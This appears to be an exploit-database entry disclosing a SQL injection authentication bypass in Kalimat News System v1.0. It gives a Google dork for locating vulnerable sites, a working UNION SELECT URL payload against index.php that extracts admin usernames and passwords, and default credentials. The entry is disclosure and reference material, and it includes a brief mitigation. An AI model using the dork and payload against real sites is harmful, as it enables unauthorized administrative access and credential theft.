header-logo
Suggest Exploit
vendor:
Kalimat News System
by:
ProF.Code
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Kalimat News System
Affected Version From: Kalimat v 1.0
Affected Version To: Kalimat v 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:kalimat:kalimat_news_system:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2020

Kalimat v 1.0 admin by pass (index.php)

This exploit allows an attacker to bypass authentication by exploiting a SQL injection vulnerability in Kalimat v 1.0. The attacker can use a Google dork to find vulnerable websites and then use a UNION SELECT statement to retrieve the username and password from the user table. The attacker can then use the retrieved credentials to log in as an administrator.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

=====================================
| kalimat v 1.0 admin by pass (index.php)
=====================================
Author: ProF.Code
Email :adt@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"Kalimat news system v 1.0"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/kalimat/index.php?main=nc&id=12%20and%201=0%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,concat%28ur,0x3a,ps%29,11,12,13,14,15%20from+user
user : admin
pass : pass
=============================================================